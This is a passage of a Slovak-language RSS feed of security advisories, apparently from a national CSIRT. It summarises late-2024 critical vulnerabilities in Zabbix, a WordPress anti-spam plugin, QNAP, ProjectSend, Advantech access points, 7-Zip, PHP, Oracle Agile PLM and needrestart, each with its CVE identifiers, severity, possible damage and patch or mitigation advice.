<p>Bezodkladná aktualizácia zraniteľných systémov na verzie špecifikované výrobcom v odkazoch v časti „Zdroje“. </p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25626" data-type="link" data-id="https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25626">https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25626</a></li>



<li><a href="https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25623" data-type="link" data-id="https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25623">https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25623</a></li>



<li><a href="https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25614" data-type="link" data-id="https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25614">https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25614</a></li>



<li><a href="https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25635" data-type="link" data-id="https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25635">https://support.zabbix.com/plugins/servlet/mobile#issue/ZBX-25635</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1775/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti vo WordPress plugine Spam Protection, Anti-Spam, FireWall</title>
		<link>/posts/1771</link>
					<comments>/posts/1771#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 29 Nov 2024 15:34:10 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Anti-Spam]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=1771</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Spam-protection-AntiSpam-FireWall-by-CleanTalk.jpg" alt="" /></p>Vývojári WordPress pluginu Spam Protection, Anti-Spam, FireWall vydali bezpečnostné aktualizácie, ktoré opravujú 2 kritické zraniteľnosti. Zraniteľnosti s označením CVE-2024-10542 a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Spam-protection-AntiSpam-FireWall-by-CleanTalk.jpg" alt="" /></p>
<p><strong>Vývojári WordPress pluginu Spam Protection, Anti-Spam, FireWall vydali bezpečnostné aktualizácie, ktoré opravujú 2 kritické zraniteľnosti. Zraniteľnosti s označením CVE-2024-10542 a CVE-2024-10781 možno zneužiť na inštaláciu, odstránenie, aktiváciu a deaktiváciu ľubovoľných pluginov redakčného systému a následné získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress plugin Spam Protection, Anti-Spam, FireWall vo verziách 6.44 a starších</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-10542</strong> (CVSS skóre 9,8)</p>



<p>Kritickú zraniteľnosť vo funkcii <em>checkWithoutToken</em> by vzdialený neautentifikovaný útočník prostredníctvom DNS spoofingu mohol zneužiť na obídenie mechanizmov autentifikácie a následnú inštaláciu a aktiváciu pluginov redakčného systému.</p>



<p><strong>CVE-2024-10781</strong> (CVSS skóre 9,8)</p>



<p>Zraniteľnosť CVE-2024-10781 vo funkcii <em>perform</em> spočíva v nedostatočnom overovaní hodnôt premennej <em>api_key</em> a možno ju zneužiť na obídenie mechanizmov autentifikácie a následnú inštaláciu a aktiváciu pluginov redakčného systému.</p>



<p><strong>Pozn. Aktiváciou ľubovoľných pluginov možno dosiahnuť vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Vykonávanie škodlivého kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácie zásuvného modulu Spam Protection, Anti-Spam, FireWall na verziu 6.45.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.wordfence.com/blog/2024/11/200000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-anti-spam-by-cleantalk-wordpress-plugin/">https://www.wordfence.com/blog/2024/11/200000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-anti-spam-by-cleantalk-wordpress-plugin/</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-10542">https://www.cve.org/CVERecord?id=CVE-2024-10542</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-10781">https://www.cve.org/CVERecord?id=CVE-2024-10781</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1771/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch QNAP</title>
		<link>/posts/1769</link>
					<comments>/posts/1769#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 29 Nov 2024 15:29:44 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[QNAP]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1769</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/NAS_QNAP-1.jpg" alt="" /></p>Spoločnosť QNAP vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 8 zraniteľností, z čoho 3 sú označené ako kritické....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/NAS_QNAP-1.jpg" alt="" /></p>
<p><strong>Spoločnosť QNAP vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 8 zraniteľností, z čoho 3 sú označené ako kritické. Kritické zraniteľnosti v produkte Notes Station 3 (CVE-2024-38643, CVE-2024-38645) a routeroch QuRouter (CVE-2024-48860) možno zneužiť na realizáciu SSRF útokov, získanie neoprávneného prístupu k citlivým údajom a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Notes Station 3 vo verziách starších ako 3.9.7</li>



<li>QuRouter vo verziách starších ako 2.4.3.106</li>



<li>QNAP AI Core vo verziách starších ako 3.4.1</li>



<li>QuLog Center vo verziách starších ako 1.7.0.831</li>



<li>QuLog Center vo verziách starších ako 1.8.0.888</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><span style="text-decoration: underline;">Notes Station 3:</span></strong></p>



<p><strong>CVE-2024-38643</strong> (CVSS skóre 9,3)</p>



<p>Kritická zraniteľnosť v produkte Notes Station 3 spočíva v chýbajúcej implementácii mechanizmov autentifikácie pre bližšie nešpecifikovanú kritickú funkciu a vzdialený neautentifikovaný útočník by ju mohol zneužiť na získanie neoprávneného prístupu do systému a následné vykonanie špecifickej podmnožiny systémových funkcií.</p>



<p><strong>CVE-2024-38645</strong> (CVSS skóre 9,4)</p>



<p>CVE-2024-38645 by vzdialený autentifikovaný útočník mohol zneužiť na realizáciu SSRF (Server Side Request Forgery) útokov a získanie neoprávneného prístupu k citlivým údajom.</p>



<p>Ostatné zraniteľnosti s označením <strong>CVE-2024-38644</strong> a <strong>CVE-2024-38646</strong> možno zneužiť na eskaláciu privilégií, injekciu príkazov operačného systému, vykonanie neoprávnených zmien v systéme a získanie neoprávneného prístupu k citlivým údajom.</p>



<p><strong><span style="text-decoration: underline;">QuRouter:</span></strong></p>



<p><strong>CVE-2024-48860</strong> (CVSS skóre 9,5)</p>



<p>Bližšie nešpecifikovanú kritickú zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť na injekciu príkazov operačného systému a získanie úplnej kontroly nad systémom.</p>



<p>Vysoko závažnú zraniteľnosť s označením <strong>CVE-2024-48861</strong> by lokálny neautentifikovaný útočník s fyzickým prístupom k zariadeniu mohol zneužiť na injekciu príkazov operačného systému.</p>



<p><strong><span style="text-decoration: underline;">QNAP AI Core, QuLog Center:</span></strong></p>



<p><strong>CVE-2024-38647</strong> v produkte QNAP AI Core možno zneužiť na získanie neoprávneného prístupu k citlivým údajom.</p>



<p>QuLog Center obsahuje zraniteľnosť <strong>CVE-2024-48862</strong>, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na čítanie a úpravu obsahu súborov na súborovom systéme.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie príkazov</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie špecifikované výrobcom v odkazoch v sekcii zdroje. </p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.qnap.com/en-us/security-advisory/qsa-24-36">https://www.qnap.com/en-us/security-advisory/qsa-24-36</a></li>



<li><a href="https://www.qnap.com/en-au/security-advisory/qsa-24-44">https://www.qnap.com/en-au/security-advisory/qsa-24-44</a></li>



<li><a href="https://www.qnap.com/en-us/security-advisory/qsa-24-40">https://www.qnap.com/en-us/security-advisory/qsa-24-40</a></li>



<li><a href="https://www.qnap.com/en-us/security-advisory/qsa-24-46">https://www.qnap.com/en-us/security-advisory/qsa-24-46</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1769/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v platforme ProjectSend</title>
		<link>/posts/1765</link>
					<comments>/posts/1765#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 29 Nov 2024 15:22:27 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ProjectSend]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1765</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/projectsend.png" alt="" /></p>Bezpečnostní výskumníci zo spoločnosti VulnCheck varovali pred aktívnym zneužívaním kritickej zraniteľnosti v open source platforme pre zdieľanie súborov ProjectSend. CVE-2024-11680...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/projectsend.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zo spoločnosti VulnCheck varovali pred aktívnym zneužívaním kritickej zraniteľnosti v open source platforme pre zdieľanie súborov ProjectSend. CVE-2024-11680 možno zneužiť na vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>ProjectSend vo verziách starších ako r1720</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-11680</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorených HTTP požiadaviek na <em>options.php</em> mohol zneužiť na zmenu konfigurácie aplikácie, vytváranie používateľských účtov, nahrávanie webshellov a injekciu škodlivého JavaScript kódu.</p>



<p><strong>Pozn. Zraniteľnosť bola opravená už v máji 2023, ale nakoľko bol CVE identifikátor pridelený až v novembri 2024, veľké množstvo inštancií zostáva podľa výskumníkov zraniteľných. Zraniteľnosť je aktívne zneužívaná minimálne od septembra 2024.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonávanie škodlivého kódu</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verziu r1720 a novšiu.</p>



<p>Zneužitie zraniteľnosti na upload webshellu možno odhaliť preverením prítomnosti podozrivých .PHP súborov v priečinku <em>/upload/files/</em>. Zneužitie zraniteľnosti indikuje aj prítomnosť podozrivých textových reťazcov v názve domovskej stránky alebo neočakávaná aktivácia funkcie pre registráciu nových používateľov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://vulncheck.com/blog/projectsend-exploited-itw">https://vulncheck.com/blog/projectsend-exploited-itw</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-11680">https://nvd.nist.gov/vuln/detail/CVE-2024-11680</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1765/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti bezdrôtových prístupových bodov Advantech EKI</title>
		<link>/posts/1761</link>
					<comments>/posts/1761#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 29 Nov 2024 15:18:24 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1761</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Advantech-Logo-1024x576.png" alt="" /></p>Spoločnosť Advantech vydala bezpečnostné aktualizácie na svoje priemyselné bezdrôtové prístupové body (access pointy) série EKI, ktoré opravujú 20 zraniteľností, z...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Advantech-Logo-1024x576.png" alt="" /></p>
<p><strong>Spoločnosť Advantech vydala bezpečnostné aktualizácie na svoje priemyselné bezdrôtové prístupové body (access pointy) série EKI, ktoré opravujú 20 zraniteľností, z čoho 6 je označených ako kritické. CVE-2024-50370 až CVE-2024-50375 možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>EKI-6333AC-2G s firmvérom vo verziách starších ako v1.6.5</li>



<li>EKI-6333AC-2GD s firmvérom vo verziách starších ako v1.6.5</li>



<li>EKI-6333AC-1GPO s firmvérom vo verziách starších ako v1.2.2</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-50370 až CVE-2024-50375</strong> (CVSS skóre 9,8)</p>



<p>Kritické zraniteľnosti s identifikátormi CVE-2024-50370 až CVE-2024-50374 spočívajú v nevhodnej neutralizácii špeciálnych znakov v príkazoch operačného systému. CVE-2024-50375 spočíva v chýbajúcich mechanizmoch autentifikácie pre prístup k bližšie nešpecifikovanej kritickej funkcii. Uvedené zraniteľnosti by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie mechanizmov autentifikácie, vykonanie škodlivého kódu s oprávneniami úrovne root a získanie úplnej kontroly nad systémom.</p>



<p>Ostatné vysoko závažné zraniteľnosti možno zneužiť na realizáciu XSS útokov, injekciu systémových príkazov, zneprístupnenie služby a získanie neoprávneného prístupu k citlivým údajom.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li>N<strong>edostupnosť služby</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia firmvéru zraniteľných produktov na verzie špecifikované výrobcom.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.nozominetworks.com/blog/over-the-air-vulnerabilities-discovered-in-advantech-eki-access-points">https://www.nozominetworks.com/blog/over-the-air-vulnerabilities-discovered-in-advantech-eki-access-points</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1761/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v komprimačnom nástroji 7-Zip</title>
		<link>/posts/1758</link>
					<comments>/posts/1758#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 29 Nov 2024 15:10:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[7-Zip]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1758</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/7-Zip_Logo.png" alt="" /></p>Vývojári komprimačného nástroja 7-Zip vydali bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť. CVE-2024-11477 možno podvrhnutím špeciálne vytvorených súborov zneužiť na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/7-Zip_Logo.png" alt="" /></p>
<p><strong>Vývojári komprimačného nástroja 7-Zip vydali bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť. CVE-2024-11477 možno podvrhnutím špeciálne vytvorených súborov zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>7-Zip vo verziách starších ako 24.07</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-11477</strong> (CVSS skóre 7,8)</p>



<p>Kritická zraniteľnosť s označením CVE-2024-11477 spočíva v nedostatočnom overovaní používateľských vstupov v rámci implementácie dekompresie Zstandard. Vzdialený neautentifikovaný útočník by prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol spôsobiť podtečenie celočíselnej premennej a následne vykonať škodlivý kód. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorené súbory. Zraniteľnosť odhalili výskumníci zo Zero Day Initiative (ZDI).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu 7-Zip na verziu 24.07 alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-24-1532/">https://www.zerodayinitiative.com/advisories/ZDI-24-1532/</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-11477">https://www.cve.org/CVERecord?id=CVE-2024-11477</a></li>



<li><a href="https://cybersecuritynews.com/7-zip-vulnerability-arbitrary-code/">https://cybersecuritynews.com/7-zip-vulnerability-arbitrary-code/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1758/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť vo funkcii PHP</title>
		<link>/posts/1756</link>
					<comments>/posts/1756#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 25 Nov 2024 14:56:04 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[buffer overflow]]></category>
		<category><![CDATA[PHP]]></category>
		<guid isPermaLink="false">/?p=1756</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/06/php.jpg" alt="" /></p>Bezpečnostný výskumník Yiheng Cao objavil kritickú zraniteľnosť vyskytujúcu sa v implementácii PHP funkcie ldap_escape() na 32-bitových systémoch. Táto zraniteľnosť súvisí...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/06/php.jpg" alt="" /></p>
<p><strong>Bezpečnostný výskumník Yiheng Cao objavil kritickú zraniteľnosť vyskytujúcu sa v implementácii PHP funkcie <em>ldap_escape()</em> na 32-bitových systémoch. Táto zraniteľnosť súvisí s pretečením medzipamäte, čo umožňuje zápis do pamäte mimo povolené hodnoty.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PHP 8.1.x staršie ako 8.1.31</li>



<li>PHP 8.2.x staršie ako 8.2.26</li>



<li>PHP 8.3.x staršie ako 8.3.14</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-8932</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť sa nachádza <strong>vo funkcii <em>ldap_escape()</em></strong> na 32-bitových systémoch a vyplýva z chýbajúcej kontroly dlhých reťazcov ako vstupov. Tieto môžu spôsobiť pretečenie celočíselnej premennej, čo vedie k <strong>zápisu mimo povolené hodnoty pamäte</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Poškodenie pamäte</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia PHP aspoň na verzie:</p>



<ul>
<li>8.1.31</li>



<li>8.2.26</li>



<li>8.3.14</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8932">https://nvd.nist.gov/vuln/detail/CVE-2024-8932<span class="MsoHyperlink"></span></a></li>



<li><a href="https://www.php.net/ChangeLog-8.php#PHP_8_3">https://www.php.net/ChangeLog-8.php#PHP_8_3</a></li>



<li><a href="https://access.redhat.com/security/cve/cve-2024-8932">https://access.redhat.com/security/cve/cve-2024-8932</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1756/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zero-day zraniteľnosť v Oracle Agile PLM Framework</title>
		<link>/posts/1729</link>
					<comments>/posts/1729#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 22 Nov 2024 10:34:51 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Oracle]]></category>
		<guid isPermaLink="false">/?p=1729</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Oracle-Logo-1024x576.jpg" alt="" /></p>Spoločnosť Oracle vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť v produkte Agile Product Lifecycle Management (PLM) Framework. CVE-2024-21287...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Oracle-Logo-1024x576.jpg" alt="" /></p>
<p><strong>Spoločnosť Oracle vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť v produkte Agile Product Lifecycle Management (PLM) Framework. CVE-2024-21287 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Oracle Agile PLM Framework vo verzii 9.3.6</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-21287</strong> (CVSS skóre 7,5)<br><br>Bližšie nešpecifikovanú vysoko závažnú zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť na stiahnutie súborov zo súborového systému a získanie neoprávneného prístupu k citlivým údajom. Bezpečnostnú zraniteľnosť objavili výskumníci zo spoločnosti CrowdStrike.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Oracle odporúča bezodkladnú aktualizáciu zraniteľných systémov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.oracle.com/security-alerts/alert-cve-2024-21287.html">https://www.oracle.com/security-alerts/alert-cve-2024-21287.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/oracle-warns-of-agile-plm-file-disclosure-flaw-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/oracle-warns-of-agile-plm-file-disclosure-flaw-exploited-in-attacks/</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/388895">https://exchange.xforce.ibmcloud.com/vulnerabilities/388895</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1729/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v linuxovom nástroji needrestart umožňujú získanie úplnej kontroly nad systémom</title>
		<link>/posts/1727</link>
					<comments>/posts/1727#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 22 Nov 2024 10:24:49 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[needrestart]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1727</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/signal-2022-02-09-114137_002.png" alt="" /></p>Vývojári linuxového nástroja needrestart vydali bezpečnostné aktualizácie, ktoré opravujú 5 zraniteľností. Zraniteľnosti s označením CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224 a CVE-2024-11003...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/signal-2022-02-09-114137_002.png" alt="" /></p>
<p><strong>Vývojári linuxového nástroja needrestart vydali bezpečnostné aktualizácie, ktoré opravujú 5 zraniteľností. Zraniteľnosti s označením CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224 a CVE-2024-11003 by lokálny autentifikovaný útočník mohol zneužiť na získanie úplnej kontroly nad systémom. </strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>needrestart vo verziách starších ako 3.8</li>
</ul>



<p><em>Pozn. Komponent needrestart je súčasťou predvolenej inštalácie Ubuntu Server od verzie 21.04</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-48990, CVE-2024-48992</strong>  (CVSS skóre 7,8)<br><br>Zraniteľnosti spočívajú v nedostatočnom overovaní obsahu premenných prostredia PYTHONPATH (CVE-2024-48990) a RUBYLIB (CVE-2024-48992) a lokálny autentifikovaný útočník by ich mohol zneužiť na vykonanie škodlivého kódu s oprávneniami úrovne root.<br><br><strong>CVE-2024-48991</strong> (CVSS skóre 7,8)<br><br>CVE-2024-48991 spočíva v súbehu procesov a lokálny útočník by ju podvrhnutím špeciálne vytvorených súborov mohol zneužiť na vykonanie škodlivého kódu s oprávneniami úrovne root.<br><br><strong>CVE-2024-10224, CVE-2024-11003</strong> (CVSS skóre 7,8)</p>



<p>Zraniteľnosti nachádzajúce sa v Perl knižnici Modules::ScanDeps spočívajú v nedostatočnom overovaní používateľských vstupov a možno ich zneužiť na vykonanie systémových príkazov s oprávneniami úrovne root.</p>



<p>Zraniteľnosti objavili bezpečnostní výskumníci zo spoločnosti Qualys.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;
     mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:
     SK"></span>Vykonanie kódu<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;
     mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:
     SK"></span></strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame bezodkladnú aktualizáciu komponentu na verziu 3.8. <br><br>V prípade, že aktualizáciu nie možné vykonať, zraniteľnosť možno mitigovať deaktiváciou funkcionality pre skenovanie interpreterov, ktorú možno vykonať modifikáciou konfiguračného súboru /etc/needrestart/needrestart.conf. Parameter $nrconf{interpscan} je potrebné nastaviť na hodnotu 0.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.qualys.com/2024/11/19/needrestart/needrestart.txt">https://www.qualys.com/2024/11/19/needrestart/needrestart.txt</a></li>



<li><a href="https://blog.qualys.com/vulnerabilities-threat-research/2024/11/19/qualys-tru-uncovers-five-local-privilege-escalation-vulnerabilities-in-needrestart">https://blog.qualys.com/vulnerabilities-threat-research/2024/11/19/qualys-tru-uncovers-five-local-privilege-escalation-vulnerabilities-in-needrestart</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/ubuntu-linux-impacted-by-decade-old-needrestart-flaw-that-gives-root/">https://www.bleepingcomputer.com/news/security/ubuntu-linux-impacted-by-decade-old-needrestart-flaw-that-gives-root/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1727/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v routroch D-Link s ukončenou technickou podporou</title>
		<link>/posts/1725</link>
					<comments>/posts/1725#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 22 Nov 2024 10:16:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[D-Link]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1725</guid>

